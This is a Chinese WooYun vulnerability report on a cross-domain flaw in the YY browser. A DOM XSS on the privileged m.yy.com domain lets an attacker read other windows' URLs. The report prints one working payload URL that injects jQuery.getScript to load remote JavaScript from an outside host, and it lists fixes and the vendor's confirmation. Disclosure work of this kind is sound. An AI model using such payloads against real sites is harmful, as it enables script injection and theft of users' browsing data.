漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110228
漏洞标题:YY浏览器设计缺陷导致存在跨域漏洞
相关厂商:广州多玩
漏洞作者: 梧桐雨
提交时间:2015-04-25 00:54
修复时间:2015-07-26 17:38
公开时间:2015-07-26 17:38
漏洞类型:设计错误/逻辑缺陷
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-25: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向第三方安全合作伙伴开放
2015-06-21: 细节向核心白帽子及相关领域专家公开
2015-07-01: 细节向普通白帽子公开
2015-07-11: 细节向实习白帽子公开
2015-07-26: 细节向公众公开
简要描述:
可以跨窗口读取用户信息
详细说明:
在最近的更新里,发现yy已经将浏览器插件的2处xss漏洞均已经修补。但是更新却又带来了新的安全问题。
譬如在m.yy.com 允许执行特定的危险API:
在早期版本的时候,只有ie.yy.com 以及wan.yy.com 允许执行该函数接口。当初寻找良久,挨个挨个看,都没发现有明显的xss漏洞。这一次的更新:最新版:
之前给你们报过此处xss漏洞,并且你们已经修补过一次这里的xss漏洞:m.yy.com,是一个domxss,但是在今天测试发现你们的修补又失效了。猜测是程序员修补的时候又把旧代码覆盖了?
经过对你们源码的观察,发现你们引入了jquery,允许通过
jQuery.getScript() 来获取远程js内容。
直接构造:
http://m.yy.com/live/toRank.action?f=%22);%0ajQuery.getScript(%22http://wutongyu.info/1.js%22)//
打开可以看到获取了我所有窗口的url内容:
漏洞证明:
都在详细说明里头。
修复方案:
1:)彻底修补此处xss。
2:)特权域不要过多,避免随意一个分站点的xss直接对用户浏览器构成威胁。
版权声明:转载请注明来源 梧桐雨@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-04-27 17:37
厂商回复:
感谢欢聚时代对安全工作的支持,我们会尽快安排修复!
最新状态:
暂无